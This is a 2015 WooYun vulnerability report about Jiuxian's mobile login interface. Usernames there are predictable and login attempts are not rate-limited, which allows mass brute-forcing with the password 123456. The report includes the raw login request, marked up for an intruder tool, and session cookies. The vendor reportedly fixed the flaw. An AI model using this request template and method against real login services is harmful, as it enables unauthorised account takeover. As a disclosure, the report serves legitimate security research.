当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0156401

漏洞标题:酒仙网某接口限制不当导致大量撞库问题

相关厂商:酒仙网

漏洞作者: 路人甲

提交时间:2015-11-27 17:51

修复时间:2016-01-14 22:45

公开时间:2016-01-14 22:45

漏洞类型:设计缺陷/逻辑错误

危害等级:中

自评Rank:10

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-27: 细节已通知厂商并且等待厂商处理中
2015-12-01: 厂商已经确认,细节仅向厂商公开
2015-12-11: 细节向核心白帽子及相关领域专家公开
2015-12-21: 细节向普通白帽子公开
2015-12-31: 细节向实习白帽子公开
2016-01-14: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

酒仙网某接口限制不当导致大量撞库问题

详细说明:

酒仙网在用邮箱注册的时候,会随机生成一个用户名 如:jxw32835384 使用该用户名也可以登陆。生成规则大概是这样,所以生成一堆用户名。使用123456密码登陆。使用酒仙网wap站进行暴力破解。 这个问题已经提交过了 一直没有修改。
WooYun: 酒仙网登陆撞库问题
又跑了一把,还是没有修复

GET /m_v1/user/ajax?user_name=jxw05645999&password=§e10adc3949ba59abbe56e057f20f883e§&verify_reg= HTTP/1.1
Host: m.jiuxian.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://m.jiuxian.com/m_v1/user
Cookie: PHPSESSID=42952771abbd4428a8cf650f81c21011; MJX_APP_KEY=42952771abbd4428a8cf650f81c21011; OZ_1U_1918=vid=v6581db42e285a.0&ctime=1448615469&ltime=1448615469; OZ_1Y_1918=erefer=-&eurl=http%3A//m.jiuxian.com/&etime=1448615348&ctime=1448615469&ltime=1448615469&compid=1918; JX_SID=ba4e5255-7729-1b5c-b355-2028207c41bb; JX_TID=17feeb2c-cc9d-1d58-acd3-98d843c7eda1; _ga=GA1.2.852890424.1448615352; _gat=1; bfd_s=17458850.91342386.1448615352443; tmc=4.17458850.47357196.1448615352450.1448615463154.1448615469622; tma=17458850.47357196.1448615352450.1448615352450.1448615352450.1; tmd=4.17458850.47357196.1448615352450.; bfd_g=8a7bc81f66bd068d0000431e0015914e5656cf69
Connection: keep-alive


1.jpg


密码都是123456

1.jpg


漏洞证明:

酒仙网在用邮箱注册的时候,会随机生成一个用户名 如:jxw32835384 使用该用户名也可以登陆。生成规则大概是这样,所以生成一堆用户名。使用123456密码登陆。使用酒仙网wap站进行暴力破解。 这个问题已经提交过了 一直没有修改。
WooYun: 酒仙网登陆撞库问题
又跑了一把,还是没有修复

GET /m_v1/user/ajax?user_name=jxw05645999&password=§e10adc3949ba59abbe56e057f20f883e§&verify_reg= HTTP/1.1
Host: m.jiuxian.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://m.jiuxian.com/m_v1/user
Cookie: PHPSESSID=42952771abbd4428a8cf650f81c21011; MJX_APP_KEY=42952771abbd4428a8cf650f81c21011; OZ_1U_1918=vid=v6581db42e285a.0&ctime=1448615469&ltime=1448615469; OZ_1Y_1918=erefer=-&eurl=http%3A//m.jiuxian.com/&etime=1448615348&ctime=1448615469&ltime=1448615469&compid=1918; JX_SID=ba4e5255-7729-1b5c-b355-2028207c41bb; JX_TID=17feeb2c-cc9d-1d58-acd3-98d843c7eda1; _ga=GA1.2.852890424.1448615352; _gat=1; bfd_s=17458850.91342386.1448615352443; tmc=4.17458850.47357196.1448615352450.1448615463154.1448615469622; tma=17458850.47357196.1448615352450.1448615352450.1448615352450.1; tmd=4.17458850.47357196.1448615352450.; bfd_g=8a7bc81f66bd068d0000431e0015914e5656cf69
Connection: keep-alive


1.jpg


密码都是123456

1.jpg


修复方案:

改一下吧

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-12-01 13:17

厂商回复:

感谢漏洞提交,尽快修补

最新状态:

2016-01-14:已确认修补